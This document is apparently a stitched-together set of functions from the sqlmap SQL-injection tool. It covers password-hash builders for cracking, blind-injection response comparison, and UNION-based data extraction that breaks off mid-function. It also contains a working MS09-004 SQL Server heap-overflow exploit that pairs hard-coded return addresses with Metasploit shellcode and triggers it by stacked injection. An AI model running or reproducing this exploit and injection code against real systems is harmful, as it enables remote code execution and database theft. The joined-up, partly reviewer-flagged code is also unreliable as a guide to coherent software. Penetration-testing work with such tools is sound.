def django_md5_passwd(password, salt, **kwargs):
    """
    Builds a salted MD5 hash in the "md5$<salt>$<hexdigest>" layout, the
    digest being taken over the salt followed by the password (extra
    keyword arguments are accepted and ignored)

    Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py

    >>> django_md5_passwd(password='******', salt='salt')
    'md5$salt$972141bcbcb6a0acc96e92309175b3c5'
    """

    salted = getBytes(salt) + getBytes(password)
    digest = md5(salted).hexdigest()

    return "md5$%s$%s" % (salt, digest)
def django_sha1_passwd(password, salt, **kwargs):
    """
    Builds a salted SHA-1 hash in the "sha1$<salt>$<hexdigest>" layout, the
    digest being taken over the salt followed by the password (extra
    keyword arguments are accepted and ignored)

    Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py

    >>> django_sha1_passwd(password='******', salt='salt')
    'sha1$salt$6ce0e522aba69d8baa873f01420fccd0250fc5b2'
    """

    salted = getBytes(salt) + getBytes(password)
    digest = sha1(salted).hexdigest()

    return "sha1$%s$%s" % (salt, digest)
def joomla_passwd(password, salt, **kwargs):
    """
    Builds a "<hexdigest>:<salt>" hash where the MD5 digest is taken over
    the password followed by the salt (extra keyword arguments are accepted
    and ignored)

    Reference: https://stackoverflow.com/a/10428239

    >>> joomla_passwd(password='******', salt='6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf')
    'e3d5794da74e917637332e0d21b76328:6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf'
    """

    salted = getBytes(password) + getBytes(salt)
    digest = md5(salted).hexdigest()

    return "%s:%s" % (digest, salt)
def ssha_passwd(password, salt, **kwargs):
    """
    Builds an "{SSHA}" hash: the Base64 encoding of the SHA-1 digest of
    password + salt, with the raw salt appended to the digest before
    encoding (extra keyword arguments are accepted and ignored)

    >>> ssha_passwd(password='******', salt='salt')
    '{SSHA}mU1HPTvnmoXOhE4ROHP6sWfbfoRzYWx0'
    """

    password = getBytes(password)
    salt = getBytes(salt)

    encoded = base64.b64encode(sha1(password + salt).digest() + salt)

    # b64encode() returns bytes; formatting bytes with "%s" on Python 3 would
    # embed their repr ("b'...'") into the result. On Python 2 bytes is str,
    # so the value is already native text and is left untouched
    if not isinstance(encoded, str):
        encoded = encoded.decode("ascii")

    return "{SSHA}%s" % encoded
def ssha256_passwd(password, salt, **kwargs):
    """
    Builds an "{SSHA256}" hash: the Base64 encoding of the SHA-256 digest of
    password + salt, with the raw salt appended to the digest before
    encoding (extra keyword arguments are accepted and ignored)

    >>> ssha256_passwd(password='******', salt='salt')
    '{SSHA256}hhubsLrO/Aje9F/kJrgv5ZLE40UmTrVWvI7Dt6InP99zYWx0'
    """

    password = getBytes(password)
    salt = getBytes(salt)

    encoded = base64.b64encode(sha256(password + salt).digest() + salt)

    # b64encode() returns bytes; formatting bytes with "%s" on Python 3 would
    # embed their repr ("b'...'") into the result. On Python 2 bytes is str,
    # so the value is already native text and is left untouched
    if not isinstance(encoded, str):
        encoded = encoded.decode("ascii")

    return "{SSHA256}%s" % encoded
def ssha512_passwd(password, salt, **kwargs):
    """
    Builds an "{SSHA512}" hash: the Base64 encoding of the SHA-512 digest of
    password + salt, with the raw salt appended to the digest before
    encoding (extra keyword arguments are accepted and ignored)

    >>> ssha512_passwd(password='******', salt='salt')
    '{SSHA512}mCUSLfPMhXCQOJl9WHW/QMn9v9sjq7Ht/Wk7iVau8vLOfh+PeynkGMikqIE8sStFd0khdfcCD8xZmC6UyjTxsHNhbHQ='
    """

    password = getBytes(password)
    salt = getBytes(salt)

    encoded = base64.b64encode(sha512(password + salt).digest() + salt)

    # b64encode() returns bytes; formatting bytes with "%s" on Python 3 would
    # embed their repr ("b'...'") into the result. On Python 2 bytes is str,
    # so the value is already native text and is left untouched
    if not isinstance(encoded, str):
        encoded = encoded.decode("ascii")

    return "{SSHA512}%s" % encoded
def wordpress_passwd(password, salt, count, prefix, **kwargs):
    """
    Builds a hash made of the given prefix followed by the ITOA64 encoding
    of an iterated MD5 digest: md5(salt + password) is computed first and
    then re-hashed together with the password `count` more times (extra
    keyword arguments are accepted and ignored)

    Reference(s):
        http://packetstormsecurity.org/files/74448/phpassbrute.py.txt
        http://scriptserver.mainframe8.com/wordpress_password_hasher.php

    >>> wordpress_passwd(password='******', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp')
    '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0'
    """

    def _encode64(input_, count):
        def _byte(index):
            # items are already integers when indexing bytes on Python 3
            item = input_[index]
            return item if isinstance(item, int) else ord(item)

        chars = []
        pos = 0

        while pos < count:
            value = _byte(pos)
            pos += 1
            chars.append(ITOA64[value & 0x3f])

            if pos < count:
                value |= _byte(pos) << 8

            chars.append(ITOA64[(value >> 6) & 0x3f])

            pos += 1
            if pos >= count:
                break

            # reaching this point implies pos < count, so a third byte exists
            value |= _byte(pos) << 16

            chars.append(ITOA64[(value >> 12) & 0x3f])

            pos += 1
            if pos >= count:
                break

            chars.append(ITOA64[(value >> 18) & 0x3f])

        return ''.join(chars)

    password = getBytes(password)
    salt = getBytes(salt)

    digest = md5(salt + password).digest()

    for _ in xrange(count):
        digest = md5(digest + password).digest()

    return "%s%s" % (prefix, _encode64(digest, 16))
def vbulletin_passwd(password, salt, **kwargs):
    """
    Builds a "<hexdigest>:<salt>" hash where the digest is
    md5(md5(password).hexdigest() + salt) (extra keyword arguments are
    accepted and ignored)

    The salt is echoed in the result exactly as it was passed in.

    Reference: https://stackoverflow.com/a/2202810

    >>> vbulletin_passwd(password='******', salt='salt')
    '85c4d8ea77ebef2236fb7e9d24ba9482:salt'
    """

    inner = md5(getBytes(password)).hexdigest()

    # The inner hex digest is text while the salt is hashed as bytes; both
    # are converted to bytes and concatenated, as "%s" formatting of bytes
    # yields "b'...'" on Python 3 and md5() refuses text input there
    digest = md5(getBytes(inner) + getBytes(salt)).hexdigest()

    return "%s:%s" % (digest, salt)
def postgres_passwd(password, username, uppercase=False):
    """
    Builds an "md5<hexdigest>" hash where the MD5 digest is taken over the
    password followed by the username; the whole result is upper-cased when
    uppercase is set and lower-cased otherwise

    Reference(s):
        http://pentestmonkey.net/blog/cracking-postgres-hashes/

    >>> postgres_passwd(password='******', username='******', uppercase=False)
    'md599e5ea7a6f7c3269995cba3927fd0093'
    """

    user = getBytes(username)
    secret = getBytes(password)

    hashed = "md5%s" % md5(secret + user).hexdigest()

    if uppercase:
        return hashed.upper()

    return hashed.lower()
def crypt_generic_passwd(password, salt, **kwargs):
    """
    Passes the byte forms of the password and salt to crypt() and returns
    its result unchanged (extra keyword arguments are accepted and ignored)

    Reference(s):
        http://docs.python.org/library/crypt.html
        http://helpful.knobs-dials.com/index.php/Hashing_notes
        http://php.net/manual/en/function.crypt.php
        http://carey.geek.nz/code/python-fcrypt/

    >>> crypt_generic_passwd(password='******', salt='rl', uppercase=False)
    'rl.3StKT.4T8M'
    """

    return crypt(getBytes(password), getBytes(salt))
def sha512_generic_passwd(password, uppercase=False):
    """
    Returns the hexadecimal SHA-512 digest of the password, upper-cased when
    uppercase is set and lower-cased otherwise

    >>> sha512_generic_passwd(password='******', uppercase=False)
    '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44'
    """

    digest = sha512(getBytes(password)).hexdigest()

    if uppercase:
        return digest.upper()

    return digest.lower()
def sha384_generic_passwd(password, uppercase=False):
    """
    Returns the hexadecimal SHA-384 digest of the password, upper-cased when
    uppercase is set and lower-cased otherwise

    >>> sha384_generic_passwd(password='******', uppercase=False)
    '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf'
    """

    digest = sha384(getBytes(password)).hexdigest()

    if uppercase:
        return digest.upper()

    return digest.lower()
def apache_sha1_passwd(password, **kwargs):
    """
    Builds an "{SHA}" hash: the Base64 encoding of the raw SHA-1 digest of
    the password (extra keyword arguments are accepted and ignored)

    >>> apache_sha1_passwd(password='******')
    '{SHA}IGyAQTualsExLMNGt9JRe4RGPt0='
    """

    password = getBytes(password)

    encoded = base64.b64encode(sha1(password).digest())

    # b64encode() returns bytes; formatting bytes with "%s" on Python 3 would
    # embed their repr ("b'...'") into the result. On Python 2 bytes is str,
    # so the value is already native text and is left untouched
    if not isinstance(encoded, str):
        encoded = encoded.decode("ascii")

    return "{SHA}%s" % encoded
def sha256_generic_passwd(password, uppercase=False):
    """
    Returns the hexadecimal SHA-256 digest of the password, upper-cased when
    uppercase is set and lower-cased otherwise

    >>> sha256_generic_passwd(password='******', uppercase=False)
    '13d249f2cb4127b40cfa757866850278793f814ded3c587fe5889e889a7a9f6c'
    """

    digest = sha256(getBytes(password)).hexdigest()

    if uppercase:
        return digest.upper()

    return digest.lower()
def sha224_generic_passwd(password, uppercase=False):
    """
    Returns the hexadecimal SHA-224 digest of the password, upper-cased when
    uppercase is set and lower-cased otherwise

    >>> sha224_generic_passwd(password='******', uppercase=False)
    '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f'
    """

    digest = sha224(getBytes(password)).hexdigest()

    if uppercase:
        return digest.upper()

    return digest.lower()
def md5_generic_passwd(password, uppercase=False):
    """
    Returns the hexadecimal MD5 digest of the password, upper-cased when
    uppercase is set and lower-cased otherwise

    >>> md5_generic_passwd(password='******', uppercase=False)
    '179ad45c6ce2cb97cf1029e212046e81'
    """

    digest = md5(getBytes(password)).hexdigest()

    if uppercase:
        return digest.upper()

    return digest.lower()
def sha1_generic_passwd(password, uppercase=False):
    """
    Returns the hexadecimal SHA-1 digest of the password, upper-cased when
    uppercase is set and lower-cased otherwise

    >>> sha1_generic_passwd(password='******', uppercase=False)
    '206c80413b9a96c1312cc346b7d2517b84463edd'
    """

    digest = sha1(getBytes(password)).hexdigest()

    if uppercase:
        return digest.upper()

    return digest.lower()
def mysql_passwd(password, uppercase=True):
    """
    Builds a "*<hexdigest>" hash where the digest is the SHA-1 of the raw
    SHA-1 digest of the password; the whole result is upper-cased when
    uppercase is set and lower-cased otherwise

    Reference(s):
        http://csl.sublevel3.org/mysql-password-function/

    >>> mysql_passwd(password='******', uppercase=True)
    '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'
    """

    first_round = sha1(getBytes(password)).digest()
    hashed = "*%s" % sha1(first_round).hexdigest()

    if uppercase:
        return hashed.upper()

    return hashed.lower()
def oracle_old_passwd(password, username, uppercase=True):
    """
    Builds the hash used prior to version '11g': the upper-cased
    username + password, with a NUL prepended to every item, is DES-CBC
    encrypted with a fixed key; the last 8 bytes of that output become the
    key for a second DES-CBC pass over the same text, whose last 8 bytes
    are returned hex-encoded (upper-cased when uppercase is set and
    lower-cased otherwise)

    Reference(s):
        http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/

    >>> oracle_old_passwd(password='******', username='******', uppercase=True)
    'F894844C34402B67'
    """

    iv = "\0" * 8
    padding = "\0"

    user = getBytes(username)
    secret = getBytes(password)

    plaintext = "".join(["\0%s" % char for char in (user + secret).upper()])

    first_pass = des(hexdecode("0123456789ABCDEF"), CBC, iv, padding).encrypt(plaintext)
    second_pass = des(first_pass[-8:], CBC, iv, padding).encrypt(plaintext)

    hashed = hexencode(second_pass[-8:])

    if uppercase:
        return hashed.upper()

    return hashed.lower()
def hashKey(key):
    """
    Maps a key onto a non-negative integer fitting into 63 bits, derived
    from the MD5 digest of the key itself (when it is a text string) or of
    its repr() (for anything else)
    """

    text = key if isinstance(key, six.text_type) else repr(key)
    digest = hashlib.md5(getBytes(text)).hexdigest()

    # Reference: http://stackoverflow.com/a/4448400
    return int(digest, 16) & 0x7fffffffffffffff
def _comparison(page, headers, code, getRatioValue, pageLength):
    """
    Compares a response against the user supplied match criteria
    (conf.string, conf.notString, conf.regexp, conf.code) or, when none of
    them is set, against the stored page template (kb.pageTemplate)

    page          -- response body (may be None)
    headers       -- response headers object exposing a `.headers` iterable
                     of header lines (may be falsy)
    code          -- HTTP status code of the response
    getRatioValue -- when set, the computed similarity ratio is returned
                     instead of a verdict (only if no earlier return fired)
    pageLength    -- response length, used in place of the body when
                     kb.nullConnection is set

    Returns True/False as the comparison verdict, None when no decision can
    be made, or the ratio itself when getRatioValue is set. Raises
    SqlmapNoneDataException when kb.nullConnection is set but the sequence
    matcher holds no original page content.
    """

    threadData = getCurrentThreadData()

    # In test mode the last compared response is stored in the thread data
    if kb.testMode:
        threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else ""
        threadData.lastComparisonPage = page
        threadData.lastComparisonCode = code

    if page is None and pageLength is None:
        return None

    if any((conf.string, conf.notString, conf.regexp)):
        # Headers (without the URI pseudo-header) and body are matched as one text
        rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page)

        # String to match in page when the query is True and/or valid
        if conf.string:
            return conf.string in rawResponse

        # String to match in page when the query is False and/or invalid
        if conf.notString:
            return conf.notString not in rawResponse

        # Regular expression to match in page when the query is True and/or valid
        if conf.regexp:
            return re.search(conf.regexp, rawResponse, re.I | re.M) is not None

    # HTTP code to match when the query is valid
    if conf.code:
        return conf.code == code

    seqMatcher = threadData.seqMatcher
    seqMatcher.set_seq1(kb.pageTemplate)

    if page:
        # In case of an DBMS error page return None
        if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic:
            return None

        # Dynamic content lines to be excluded before comparison
        if not kb.nullConnection:
            page = removeDynamicContent(page)
            seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))

        if not pageLength:
            pageLength = len(page)

    if kb.nullConnection and pageLength:
        # Only lengths are available here, hence the ratio is the quotient
        # of the two lengths (inverted when greater than 1)
        if not seqMatcher.a:
            errMsg = "problem occurred while retrieving original page content "
            errMsg += "which prevents sqlmap from continuation. Please rerun, "
            errMsg += "and if the problem persists turn off any optimization switches"
            raise SqlmapNoneDataException(errMsg)

        ratio = 1. * pageLength / len(seqMatcher.a)

        if ratio > 1.:
            ratio = 1. / ratio
    else:
        # Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
        # (e.g. if one page is PDF and the other is HTML)
        if isinstance(seqMatcher.a, six.binary_type) and isinstance(page, six.text_type):
            page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
        elif isinstance(seqMatcher.a, six.text_type) and isinstance(page, six.binary_type):
            seqMatcher.a = getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")

        if any(_ is None for _ in (page, seqMatcher.a)):
            return None
        elif seqMatcher.a and page and seqMatcher.a == page:
            ratio = 1.
        elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
            # Sequence matching is skipped (on request or because an input
            # exceeds MAX_DIFFLIB_SEQUENCE_LENGTH); lengths are compared instead
            if not page or not seqMatcher.a:
                return float(seqMatcher.a == page)
            else:
                ratio = 1. * len(seqMatcher.a) / len(page)
                if ratio > 1:
                    ratio = 1. / ratio
        else:
            seq1, seq2 = None, None

            if conf.titles:
                seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a)
                seq2 = extractRegexResult(HTML_TITLE_REGEX, page)
            else:
                seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a
                seq2 = getFilteredPageContent(page, True) if conf.textOnly else page

            if seq1 is None or seq2 is None:
                return None

            seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
            seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")

            # Heavily dynamic pages are compared line by line (and with the
            # full ratio() instead of quick_ratio() below)
            if kb.heavilyDynamic:
                seq1 = seq1.split("\n")
                seq2 = seq2.split("\n")

            seqMatcher.set_seq1(seq1)
            seqMatcher.set_seq2(seq2)

            ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3)

    # If the url is stable and we did not set yet the match ratio and the
    # current injected value changes the url page content
    if kb.matchRatio is None:
        if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
            kb.matchRatio = ratio
            logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio)

    if kb.testMode:
        threadData.lastComparisonRatio = ratio

    # If it has been requested to return the ratio and not a comparison
    # response
    if getRatioValue:
        return ratio

    elif ratio > UPPER_RATIO_BOUND:
        return True

    elif ratio < LOWER_RATIO_BOUND:
        return False

    elif kb.matchRatio is None:
        return None

    else:
        # Verdict is True only when the ratio exceeds the stored match
        # ratio by more than DIFF_TOLERANCE
        return (ratio - kb.matchRatio) > DIFF_TOLERANCE
def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
    """
    Builds an MD5-crypt style hash "<magic><salt>$<encoded digest>" using at
    most the first 8 bytes of the salt and 1000 MD5 rounds (extra keyword
    arguments are accepted and ignored)

    The result is a text string (hence the u'' prefix shown below when run
    under Python 2).

    Reference(s):
        http://www.sabren.net/code/python/crypt/md5crypt.py

    >>> unix_md5_passwd(password='******', salt='aD9ZLmkp')
    u'$1$aD9ZLmkp$DRM5a7rRZGyuuOPOjTEk61'
    """

    def _encode64(value, count):
        # Emits `count` ITOA64 characters, 6 bits at a time, lowest bits
        # first; built as text so that no decoding is needed afterwards
        output = u""

        while count > 0:
            count -= 1
            output += ITOA64[value & 0x3f]
            value >>= 6

        return output

    password = getBytes(password)
    magic = getBytes(magic)
    salt = getBytes(salt)[:8]

    ctx = password + magic + salt
    final = md5(password + salt + password).digest()

    for pl in xrange(len(password), 0, -16):
        ctx += final[:min(pl, 16)]

    i = len(password)
    while i:
        if i & 1:
            # bytes literal (not chr(0)) so that the concatenation also
            # works on Python 3; if ($i & 1) { $ctx->add(pack("C", 0)); }
            ctx += b"\x00"
        else:
            # slicing (not indexing) keeps a one-byte bytes object on
            # Python 3, where indexing bytes yields an integer
            ctx += password[0:1]
        i >>= 1

    final = md5(ctx).digest()

    for i in xrange(1000):
        ctx1 = b""

        if i & 1:
            ctx1 += password
        else:
            ctx1 += final[:16]

        if i % 3:
            ctx1 += salt

        if i % 7:
            ctx1 += password

        if i & 1:
            ctx1 += final[:16]
        else:
            ctx1 += password

        final = md5(ctx1).digest()

    # bytearray items are integers on both Python 2 and 3, which avoids
    # calling ord() on values that are already integers on Python 3
    final = bytearray(final)

    hash_ = _encode64((final[0] << 16) | (final[6] << 8) | final[12], 4)
    hash_ += _encode64((final[1] << 16) | (final[7] << 8) | final[13], 4)
    hash_ += _encode64((final[2] << 16) | (final[8] << 8) | final[14], 4)
    hash_ += _encode64((final[3] << 16) | (final[9] << 8) | final[15], 4)
    hash_ += _encode64((final[4] << 16) | (final[10] << 8) | final[5], 4)
    hash_ += _encode64(final[11], 2)

    # magic and salt are bytes at this point and have to be decoded, as
    # formatting bytes with "%s" would embed "b'...'" on Python 3
    return "%s%s$%s" % (magic.decode(UNICODE_ENCODING), salt.decode(UNICODE_ENCODING), hash_)
def spHeapOverflow(self):
    """
    Builds a T-SQL batch calling master.dbo.sp_replwritetovarbin with an
    oversized buffer made of filler characters, OS specific return
    addresses and the hex-encoded shellcode (self.shellcodeString), stores
    it in self.spExploit and runs it through inject.goStacked()

    Raises SqlmapUnsupportedFeatureException when no return addresses are
    known for the OS version / service pack reported by Backend.

    References:
        * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004
        * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co
    """

    # Return addresses keyed by "<OS version>-<service pack>"; each usable
    # entry holds the 8 values substituted (in order) into the template below
    returns = {
        # 2003 Service Pack 0
        # (a parenthesized empty string, not a tuple: it is falsy and hence
        # treated below the same way as a missing entry)
        "2003-0": (""),

        # 2003 Service Pack 1
        "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"),

        # 2003 Service Pack 2 updated at 12/2008
        # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"),

        # 2003 Service Pack 2 updated at 05/2009
        "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),

        # 2003 Service Pack 2 updated at 09/2009
        # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
    }

    addrs = None

    # Pick the entry matching the back-end OS version and service pack
    for versionSp, data in returns.items():
        version, sp = versionSp.split("-")
        sp = int(sp)

        if Backend.getOsVersion() == version and Backend.getOsServicePack() == sp:
            addrs = data

            break

    if not addrs:
        errMsg = "sqlmap can not exploit the stored procedure buffer "
        errMsg += "overflow because it does not have a valid return "
        errMsg += "code for the underlying operating system (Windows "
        errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack())
        raise SqlmapUnsupportedFeatureException(errMsg)

    # Shellcode (without its last character) turned into a
    # "CHAR(0x..)+CHAR(0x..)+..." expression, one CHAR() per byte
    shellcodeChar = ""
    # NOTE(review): binascii.hexlify() returns bytes; if this runs on
    # Python 3 the "%s" formatting below would embed "b'..'" - confirm
    hexStr = binascii.hexlify(getBytes(self.shellcodeString[:-1]))

    for hexPair in xrange(0, len(hexStr), 2):
        shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2]

    # Drop the trailing "+"
    shellcodeChar = shellcodeChar[:-1]

    # Template placeholders: 8 return addresses followed by the shellcode
    self.spExploit = """DECLARE @buf NVARCHAR(4000), @val NVARCHAR(4), @counter INT SET @buf = ' DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' SET @val = CHAR(0x41) SET @counter = 0 WHILE @counter < 3320 BEGIN SET @counter = @counter + 1 IF @counter = 411 BEGIN /* pointer to call [ecx+8] */ SET @buf = @buf + %s /* push ebp, pop esp, ret 4 */ SET @buf = @buf + %s /* push ecx, pop esp, pop ebp, retn 8 */ SET @buf = @buf + %s /* Garbage */ SET @buf = @buf + CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51) /* retn 1c */ SET @buf = @buf + %s /* retn 1c */ SET @buf = @buf + %s /* anti DEP */ SET @buf = @buf + %s /* jmp esp */ SET @buf = @buf + %s /* jmp esp */ SET @buf = @buf + %s SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) set @buf = 
@buf + CHAR(0x64)+CHAR(0x8B)+CHAR(0x25)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00) set @buf = @buf + CHAR(0x8B)+CHAR(0xEC) set @buf = @buf + CHAR(0x83)+CHAR(0xEC)+CHAR(0x20) /* Metasploit shellcode */ SET @buf = @buf + %s SET @buf = @buf + CHAR(0x6a)+CHAR(0x00)+char(0xc3) SET @counter = @counter + 302 SET @val = CHAR(0x43) CONTINUE END SET @buf = @buf + @val END SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' EXEC master..sp_executesql @buf """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar)

    # NOTE(review): as written this removes every single space from the
    # statement before newlines are turned into spaces; presumably the
    # template was meant to be laid out over indented lines with only the
    # indentation being stripped - confirm against the intended layout
    self.spExploit = self.spExploit.replace(" ", "").replace("\n", " ")

    logger.info("triggering the buffer overflow vulnerability, please wait..")
    inject.goStacked(self.spExploit, silent=True)
def escaper(value):
    """
    Renders value as a hexadecimal literal: plain "0x..." when every ordinal
    reported by getOrds() is below 128, "CONVERT(0x... USING utf8)"
    otherwise
    """

    asciiOnly = all(_ < 128 for _ in getOrds(value))
    template = "0x%s" if asciiOnly else "CONVERT(0x%s USING utf8)"

    return template % getUnicode(binascii.hexlify(getBytes(value)))
def _oneShotUnionUse(expression, unpack=True, limited=False):
    """
    Retrieves the output of the given expression through a single
    UNION-based request, unless a value for it is already stored in the
    session (hashDB), in which case that one is returned

    expression -- SQL expression whose output is wanted
    unpack     -- passed through to agent.concatQuery()
    limited    -- passed through to agent.forgeUnionQuery() (not used in
                  kb.rowXmlMode)

    Returns the extracted output or None when nothing could be extracted.
    Freshly retrieved non-None output is written back to the session.
    """

    retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True)  # as UNION data is stored raw unconverted

    threadData = getCurrentThreadData()
    threadData.resumed = retVal is not None

    if retVal is None:
        vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector

        if not kb.rowXmlMode:
            injExpression = unescaper.escape(agent.concatQuery(expression, unpack))
            kb.unionDuplicates = vector[7]
            kb.forcePartialUnion = vector[8]
            query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
            where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
        else:
            where = vector[6]
            query = agent.forgeUnionQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False)

        payload = agent.payload(newValue=query, where=where)

        # Perform the request
        page, headers, _ = Request.queryPage(payload, content=True, raise404=False)

        incrementCounter(PAYLOAD.TECHNIQUE.UNION)

        if not kb.rowXmlMode:
            # Parse the returned page to get the exact UNION-based
            # SQL injection output
            # (this helper rebinds the name `_` used for the discarded
            # element above; it searches the body first, then the headers)
            def _(regex):
                return firstNotNone(
                    extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE),
                    extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)
                )

            # Automatically patching last char trimming cases
            if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
                warnMsg = "automatically patching output having last char trimmed"
                singleTimeWarnMessage(warnMsg)
                page = page.replace(kb.chars.stop[:-1], kb.chars.stop)

            retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))
        else:
            # Row XML mode: output is expected as a run of <row .../> elements
            output = extractRegexResult(r"(?P<result>(<row.+?/>)+)", page)
            if output:
                try:
                    root = xml.etree.ElementTree.fromstring(safeStringFormat("<root>%s</root>", getBytes(output)))
                    retVal = ""
                    for column in kb.dumpColumns:
                        # Local flag (shadows any module named base64 inside
                        # this function): stays True only if the column's
                        # value passes the checks below in every row
                        base64 = True
                        for child in root:
                            value = child.attrib.get(column, "").strip()
